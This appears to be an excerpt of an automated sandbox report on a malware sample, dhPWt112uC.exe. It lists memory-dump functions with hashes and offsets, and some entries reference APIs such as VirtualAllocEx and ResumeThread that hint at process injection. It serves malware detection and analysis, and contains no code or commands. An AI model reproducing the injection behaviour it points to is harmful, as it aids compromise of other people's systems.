Instruction ID: afab8519c2fe866b5a490c267e7125db07d4eeafe92f8e553b1cf89f43e9bbb0
Opcode Fuzzy Hash: de82df8db23c51d8557e11ebddd8d162ad79d684ea034b7298fe612f6b124daa
Instruction Fuzzy Hash: 6021C4B59002589FDB10CF9AD584ADEBBF8EB48310F14845AE958A7350D374A944CFA5

Function 06ABB5E0 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06ABB656

Memory Dump Source

Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8ae7fe60c158f9848f667d4d3b1c0db9631d1f1c1e40950b316a74b4e36805b6
Instruction ID: bb5e7cb9b9a0bb882eaf007ab9bca28a87a984dbc2d3e246541ee7427918a913
Opcode Fuzzy Hash: 8ae7fe60c158f9848f667d4d3b1c0db9631d1f1c1e40950b316a74b4e36805b6
Instruction Fuzzy Hash: E81156B59002499FCB10DFAAC845ADFFFF9EF88320F208419E559A7251CB75A940CFA5

Function 06ABB5E8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06ABB656

Memory Dump Source

Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 99aaf7de85f4c83f0b938f7d583390a6cee257a724dc0269c9676591afc6ca43
Instruction ID: 2d0f66fab656b5cb406a632a8aef4a3f11a486224b41c04e3d93b375dcc39c19
Opcode Fuzzy Hash: 99aaf7de85f4c83f0b938f7d583390a6cee257a724dc0269c9676591afc6ca43
Instruction Fuzzy Hash: 311167B58002488FCB10DFAAC844BDEBFF5EF88320F108419E519A7250CB75A940CFA4

Function 06ABB020 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06ABB08A

Memory Dump Source

Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e02bfc0842dcd627e9b71594892a94d4f17022574b46938d4d7aff0892a26e20
Instruction ID: 0333ae395bdd219b79b8eb8a7b0790b91439a5591144706346876e5dff942335
Opcode Fuzzy Hash: e02bfc0842dcd627e9b71594892a94d4f17022574b46938d4d7aff0892a26e20
Instruction Fuzzy Hash: 041158B59002498FCB20DFA9C4447EEFFF5AB88324F20842ED059A7240CB79A544CFA5

Function 06ABB028 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06ABB08A

Memory Dump Source

Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 179b5fb3ac6ce1b7122f2805883689da68faa2f7cbfe875070e1a434619d8cd9
Instruction ID: 7ca7628209243132ae50b960d738a07dfb2b8542c748193b16100ca24869299d
Opcode Fuzzy Hash: 179b5fb3ac6ce1b7122f2805883689da68faa2f7cbfe875070e1a434619d8cd9
Instruction Fuzzy Hash: D7113AB5D002488FCB20DFAAC4457EEFBF8EB88324F208419D559A7250CB75A544CFA5

Function 06ABE561 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06ABE5C5

Memory Dump Source

Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: e353c4e63014e2427abbaf26fcf418eac3dec34c2434e78e86fd3bf3bafea6a3
Instruction ID: c76cbc52629013958ba26c24165a54dea80e75dd6b3b8c7286759d2abb5f4d21
Opcode Fuzzy Hash: e353c4e63014e2427abbaf26fcf418eac3dec34c2434e78e86fd3bf3bafea6a3
Instruction Fuzzy Hash: 971103B9800348DFDB10DF9AC884BDEBBF8FB48324F108519E559A7601C375A944CFA5

Function 06AB9EC4 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06ABE5C5

Memory Dump Source

Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 2cefec623c3c00bd9a229cd8ae59f2246a752bd748a274f951711303a103d810
Instruction ID: 068c7530396151009036b648e0382ece696496fa787b8d9b8a384700228f1207
Opcode Fuzzy Hash: 2cefec623c3c00bd9a229cd8ae59f2246a752bd748a274f951711303a103d810
Instruction Fuzzy Hash: 631103B9800348DFDB50DF9AC885BDEBBF8FB48324F108419E558A7601D375A944CFA5

Function 00B7AFD8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00B7B03E

Memory Dump Source

Source File: 00000000.00000002.1777867522.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_dhPWt112uC.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: b278490378e08d5bb4a07e31692a4450ac9d07f5fbcf9277fda61f8a91820417
Instruction ID: 80170022b5d384a081943539b161c54fee4dc39996bca62ff8244041b1e92110
Opcode Fuzzy Hash: b278490378e08d5bb4a07e31692a4450ac9d07f5fbcf9277fda61f8a91820417
Instruction Fuzzy Hash: A9110FB6C002498FCB10CF9AC444BDEFBF4EB88324F10846AD428A7210D379A545CFA5

Function 0091D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777082543.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_91d000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31a4be63993d90325d53d40deaac2bf1e315d7e4bdf1dc17d4df8c62cbb54705
Instruction ID: 09be0f073459a91c1fff03751072925428ffea0f032eecb52c7822f99805ec9d
Opcode Fuzzy Hash: 31a4be63993d90325d53d40deaac2bf1e315d7e4bdf1dc17d4df8c62cbb54705
Instruction Fuzzy Hash: 3D213A71600208DFDB05DF14D9C0B67BF69FB98314F20C569E9094B2E6C33AE896C7A2

Function 00B2D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777653569.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2d000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 668961aefed22b8d1a5eeb97d760e1fc9bfdc3912fc52cc258f1ec1f60b683a0
Instruction ID: a0677603087c8468413cfa77e3d49ab69c020dec91609f32ff5400c5017a9899
Opcode Fuzzy Hash: 668961aefed22b8d1a5eeb97d760e1fc9bfdc3912fc52cc258f1ec1f60b683a0
Instruction Fuzzy Hash: 0B212671604200EFDB05DF14E9C4B26BBE5FB88314F30CAADE80D4B296C33AD846CA61

Function 00B2D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777653569.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2d000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3aac37bed2a54b84fb090d2422b70a0662a4acd9fc94686b3addd42011a50447
Instruction ID: 4a4f368cc8c923b414480a4da205a97561bbc74d0aa393485cfbbe216ff3d984
Opcode Fuzzy Hash: 3aac37bed2a54b84fb090d2422b70a0662a4acd9fc94686b3addd42011a50447
Instruction Fuzzy Hash: F921F271604240DFCB14DF14E9D4B27BBA5EB88314F20C6ADD94E4B2A6C33AD847CA61

Function 00B2D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777653569.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2d000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f237d22cc1354dac667432c7e68c6af51ea7c616856e4ccb04d97cea2275550a
Instruction ID: 22407f998e189617e72028760317e4bb4ed8662aafefd3e07266fa17a96bb585
Opcode Fuzzy Hash: f237d22cc1354dac667432c7e68c6af51ea7c616856e4ccb04d97cea2275550a
Instruction Fuzzy Hash: AC21A4755083809FCB02CF14D994B12BFB1FB56314F28C5DAD8498F2A7C33A980ACB62

Function 0091D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777082543.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_91d000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: ec0a43661610c9b637ead3c7a68bed7b8d3b03d68d0ba26e1d7ccb5ab16fbf46
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 07112672504244CFDB16CF00D5C4B56BF72FB94324F24C6A9DC090B2A6C33AE85ACBA1

Function 00B2D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777653569.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b2d000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: ec06dfff73b3149921f8b3b16e2ed5fdadc9dd48790dfcee92b225b28e45a421
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: AE118B75504280DFDB16CF14D5C4B15BBA1FB84314F24C6AAD8494B696C33AD84ACB61

Function 0091D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777082543.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_91d000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 594652006e23eec179b6d7acb07cd49248f780c53982cf602483a950f289e02d
Instruction ID: 6ee00b0333c5b0d3d4a3d495d7d4b2fa2a9e47f1441a50019e8d5816dd1b2a57
Opcode Fuzzy Hash: 594652006e23eec179b6d7acb07cd49248f780c53982cf602483a950f289e02d
Instruction Fuzzy Hash: 0D01DBB120A3489AE7105E25CD84BA7FFDCDF45324F18C96AED194A2C6D679D880C6B1

Function 0091D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777082543.000000000091D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0091D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_91d000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0db5f536e59d1dca327fec66d78a1e9c8f4b2e278723052e244b5f98b25a7d3b
Instruction ID: 3c179de3a7025b8f3061de62926cbcb2717c767d0bb386125711febcac1b24d1
Opcode Fuzzy Hash: 0db5f536e59d1dca327fec66d78a1e9c8f4b2e278723052e244b5f98b25a7d3b
Instruction Fuzzy Hash: B7F062B15093449EE7109E16D888BA2FFACEB55734F18C45AED085A286C2799884CAB1

Non-executed Functions

Function 06ABF8D8 Relevance: .4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2520b98c407918aa49ac4d684738ed64009b833da463b6c751ab7619b4488316
Instruction ID: e699a68d40ec61aa8fec88bc94fd119537ce08c08218fa4c0e558253984ba36c
Opcode Fuzzy Hash: 2520b98c407918aa49ac4d684738ed64009b833da463b6c751ab7619b4488316
Instruction Fuzzy Hash: F9D1C030B016448FDB99EB75C9507EEB7FAAF89300F1894ADD05ADB292CB35E901CB51

Function 06AB8718 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d2ae20b4d55b930fa77e7f809dcfaa07aab8827899ebe5896d27d49f63d431d
Instruction ID: 15820e832bdda9ab629cc953f00e66cb506fc08d901be8a6f7a78ea3654f4e85
Opcode Fuzzy Hash: 8d2ae20b4d55b930fa77e7f809dcfaa07aab8827899ebe5896d27d49f63d431d
Instruction Fuzzy Hash: A3E14B74E002598FCB14DFA9C5809AEFBB6FF88304F24D169E415AB35AD734A941CFA1

Function 04BF0040 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1782467142.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bf0000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c60b6f27f09a03207a324be5e1d8db7ff1aa14b93cba29c6d18c7a943806a8af
Instruction ID: ceec75da0c9d7d87fddf9c308acf62887ee83c5c32930cc0405949bfc4752581
Opcode Fuzzy Hash: c60b6f27f09a03207a324be5e1d8db7ff1aa14b93cba29c6d18c7a943806a8af
Instruction Fuzzy Hash: 2F1294B0C81745CADB19CF65EA5C18D3BB1BB4131CBD04A19D2651F2E1EBB8126EEF48

Function 06ABA7A8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8126508e80d4e996454b86ac02904385ba1a3a8acc5db3e5e159aad20cb95eea
Instruction ID: 5816ea59bed8c735fdece8eb1ecec1ee6f18f6517aeb9010d8a101c89148f3d1
Opcode Fuzzy Hash: 8126508e80d4e996454b86ac02904385ba1a3a8acc5db3e5e159aad20cb95eea
Instruction Fuzzy Hash: D0E1F7B4E002598FCB14DFA9C5809AEFBB2FF88304F24D169E515AB356D731A941CFA0

Function 06ABB1B0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82f472eea44eea2a85b4835c9b1dd736af49b59525ef2859934d34f89fd54db8
Instruction ID: 7fb747c689e7202e19764a41ce681954a518c060978629cfa7046ffa3006b676
Opcode Fuzzy Hash: 82f472eea44eea2a85b4835c9b1dd736af49b59525ef2859934d34f89fd54db8
Instruction Fuzzy Hash: D4E11C74E002598FCB14DFA9C5809AEFBB2FF89304F24D169E415AB356DB31A941CFA1

Function 06AB8FA8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c99428334ec79cb74b731a7d9d14660e1d762d6d8832b17b9ec53e5e9bdcc568
Instruction ID: b4108f91dff4476edb5d1ab65e08a35ac55eb1d01c7fc54a4d12d22bed85e94c
Opcode Fuzzy Hash: c99428334ec79cb74b731a7d9d14660e1d762d6d8832b17b9ec53e5e9bdcc568
Instruction Fuzzy Hash: B7E12974E002598FCB54DFA9C5809AEFBB6FF89304F24D169E505AB35AD730A941CFA0

Function 06AB8B70 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb1daa97ac9385ee8ef97ef19f5629117c7dbfaeb19e68ec8d30e364e306cad9
Instruction ID: 916ddf57fdfa59513e82e8d190f2505f49d109f944a357a90771e3ac54a77737
Opcode Fuzzy Hash: bb1daa97ac9385ee8ef97ef19f5629117c7dbfaeb19e68ec8d30e364e306cad9
Instruction Fuzzy Hash: C2E118B4E102598FCB14DFA9C5809AEFBB6FF89304F249169E405AB356D734A941CFA0

Function 04BFEF33 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1782467142.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bf0000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 486ee00ec6a6fc4fd8c8fbe52390d63b0c3068f3a372386000af598889ede0a5
Instruction ID: 823d20a4c20a75df206dbc3346086dcc142142d61fa2dcf197e21bb3d27f6c61
Opcode Fuzzy Hash: 486ee00ec6a6fc4fd8c8fbe52390d63b0c3068f3a372386000af598889ede0a5
Instruction Fuzzy Hash: 6DD1063191075A8ADB01EB64D9A0A9DF7B1FFD5300F10C79AE10937255EB70AEC9CB81

Function 04BFEF38 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1782467142.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bf0000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05bd81d072a43d76d10751be625430fa0f2c881f5dfcce0ea0dfcde940770b1d
Instruction ID: f0a2c6199d15a7b4a09f39372a35748f388a6874f11e2a895552bcff223b2da9
Opcode Fuzzy Hash: 05bd81d072a43d76d10751be625430fa0f2c881f5dfcce0ea0dfcde940770b1d
Instruction Fuzzy Hash: 78D1F73191075A8ADB01EB64D9A0A9DF7B1FFD5300F10C79AE11937255EB70AEC9CB81

Function 00B7D3A4 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1777867522.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 471c725231d4e52b01d3e9201301a7d5cf107e29c91f0700309ed46635676702
Instruction ID: 6fffc3be1dd03219fe8c0521f9a276c79cae48d27ee7c39b7e612f6de5d2cfc1
Opcode Fuzzy Hash: 471c725231d4e52b01d3e9201301a7d5cf107e29c91f0700309ed46635676702
Instruction Fuzzy Hash: DDA14C36E00206CFCF09DFA4C8405AEB7F2FF85300B1585BAE919AB266DB71E955CB44

Function 04BF0006 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1782467142.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bf0000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da7d8be2b4c28c77e686301ef49da4472cc66ae81e5fbc8f80b5ece05d1791
Instruction ID: 8a3a0507708dedc6800816499030cfd046f163fd9df04eac962023a2132cbf35
Opcode Fuzzy Hash: 08da7d8be2b4c28c77e686301ef49da4472cc66ae81e5fbc8f80b5ece05d1791
Instruction Fuzzy Hash: 20C15DB0C80745CFDB19CF25E95818D7BB1BB8131CB944A09D2656F2D1EBB4126EEF48

Function 06ABA798 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7943c7959b6bff10427698c27e71ec84193a8c1c64a47d96891176f8ec242a98
Instruction ID: 8fb4dc0403eb0b0829ac0fb9288e8518312fd6292eac8b553aa59331148febc7
Opcode Fuzzy Hash: 7943c7959b6bff10427698c27e71ec84193a8c1c64a47d96891176f8ec242a98
Instruction Fuzzy Hash: A8512970E002198FCB14DFA9C5805AEFBB2FF89304F24C169D418AB356D7319942CFA0

Function 06ABB1A0 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dec29d9d750731c0c023be57f2e829c30259339df025ea83cebd6d492e8955b
Instruction ID: 354f1cbb8ee0e518e1080e327e3d4ea2d2e09e6886a0afa3b85dabd6be1abf31
Opcode Fuzzy Hash: 7dec29d9d750731c0c023be57f2e829c30259339df025ea83cebd6d492e8955b
Instruction Fuzzy Hash: CA51FA70E002198FDB14DFAAC9805AEFBB2FF89304F24D169D419AB256DB359941CFA1

Analysis Process: dhPWt112uC.exePID: 7628, Parent PID: 7404COMMON

Execution Graph

Execution Coverage:	12.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	156
Total number of Limit Nodes:	17

Executed Functions

Function 06F93568 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06F93CC0
$^q, xrefs: 06F93C73
$^q, xrefs: 06F93C67
$^q, xrefs: 06F93C9C
$^q, xrefs: 06F93C90
$^q, xrefs: 06F93CB4

Memory Dump Source

Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 05f63adc75cf3b21c0be36be29b97404b4b1480c8a55a473049b77f8d9f9f083
Instruction ID: c18fb6e97dcebe97ffdbf8739a8b34aa29991dfa26f4d3e6bb115ffc4eed071f
Opcode Fuzzy Hash: 05f63adc75cf3b21c0be36be29b97404b4b1480c8a55a473049b77f8d9f9f083
Instruction Fuzzy Hash: 5B321D31E1061A8FDB54DF79C89459DB7B6FFC9300F10C6AAD409AB264EB30AD85CB91

Function 06F97E60 Relevance: 3.0, Strings: 2, Instructions: 479
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06F981C3
$^q, xrefs: 06F981CF

Memory Dump Source

Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 30576d3404bb8398ddc5d6506c8a818b0061c6c754724df4676ceb5acd6beac2
Instruction ID: 1bbf32309791fc234cb45de3700f4fba300f0d57aa857e125c377914525bbb5e
Opcode Fuzzy Hash: 30576d3404bb8398ddc5d6506c8a818b0061c6c754724df4676ceb5acd6beac2
Instruction Fuzzy Hash: B202AE31B002058FEF54DF68D9806AEB7E6FF85344F108829D41AAB394DB35EC86CB91

Function 06F92751 Relevance: 1.1, Instructions: 1064COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 478ba5e385a8f22a4d44ef56b1a6e76cf9d33d8871229df80351aadda858ee21
Instruction ID: 298585729349e832348724997dc26d5ded0c2b639e404e61644ec0e07ce99f13
Opcode Fuzzy Hash: 478ba5e385a8f22a4d44ef56b1a6e76cf9d33d8871229df80351aadda858ee21
Instruction Fuzzy Hash: A4A22434E102048FEB64CB68C584B9DBBF2FB49314F5484A9E409AB365DB35ED85CFA1

Function 06F966D8 Relevance: .8, Instructions: 823COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e21c2b6e39036714fd52794187bbd4c80aed36d0e059a761ed7a1c14de2bab08
Instruction ID: 1e4f5b58a0d07ce837b20d0ea8703fa78451f1bf0cdc92156e559de94cfc2b69
Opcode Fuzzy Hash: e21c2b6e39036714fd52794187bbd4c80aed36d0e059a761ed7a1c14de2bab08
Instruction Fuzzy Hash: F7628D35E002049FEF54DB68D594AAEB7B2EF88314F148469E40ADB394DB35EC46CBA1

Function 06F9C260 Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cc1bfa5a59ce8f6279aeb933b7eedc022893fed1cb6093220cc60e15aee61eb
Instruction ID: 7fa282b99b7dfc710f1b41a2570e72d44f08e9c7f7899afa4c5ea66ef1232c4f
Opcode Fuzzy Hash: 8cc1bfa5a59ce8f6279aeb933b7eedc022893fed1cb6093220cc60e15aee61eb
Instruction Fuzzy Hash: 52329E34F002059FEF54DB68E990BAEB7B6EB88714F108525D409EB394DB34EC46CBA1

Function 06F956A8 Relevance: .6, Instructions: 604COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52df03c956e9804e1f35f0c99a3ee0c458a37a9277fa7952117b0913b2ccb61d
Instruction ID: e3cb3e7de2dcd95a1cfe93a19f5c7f7d6678b6dbc83f5b322355e3fce060c7d7
Opcode Fuzzy Hash: 52df03c956e9804e1f35f0c99a3ee0c458a37a9277fa7952117b0913b2ccb61d
Instruction Fuzzy Hash: EF220471F002158FEF65DFA4D8846AEB7B2EB85320F14842AD959DB344DB34DC46CBA1

Function 06F9B2FF Relevance: .6, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4183149098.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f90000_dhPWt112uC.jbxd

Similarity

API ID:
